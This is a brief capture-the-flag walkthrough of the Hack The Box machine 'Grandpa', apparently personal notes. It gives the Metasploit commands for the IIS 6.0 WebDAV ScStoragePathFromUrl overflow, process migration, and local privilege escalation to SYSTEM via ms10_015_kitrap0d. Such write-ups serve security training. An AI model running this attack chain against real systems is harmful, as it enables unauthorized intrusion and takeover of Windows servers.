Grandpa
HTB 9. Grandpa
nmap -T4 -A -p- 10.10.10.14shows 80 open with versionMicrosoft IIS httpd 6.0(dated version) and poentially risky methods (TRACEand `PUT)Go to
10.10.10.14shows "Under Construction" page.Google
Microsoft IIS httpd 6.0 exploitfinds Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow and Rapid7.searchsploit ScStoragePathFromUrlshows python and ruby modules.Metasploit
use exploit/windows/iis/iis_webdav_scstoragepathfromurl set rhost 10.10.10.14 set lport 5555 show targets runTry running again (4 times)
We are not system.
psto show processes. Pick a process that hasNT AUTHORITY\NETWORK SERVICEwithmigrate 1788and success.Priv esc suggester:
search suggester use 0 options set session 1 runResult: 9 options, go down list and try to see what works
start with
ms10_015_kitrap0dandset lhost tun0getuidisNT AUTHORITY\SYSTEM.
Last updated
Was this helpful?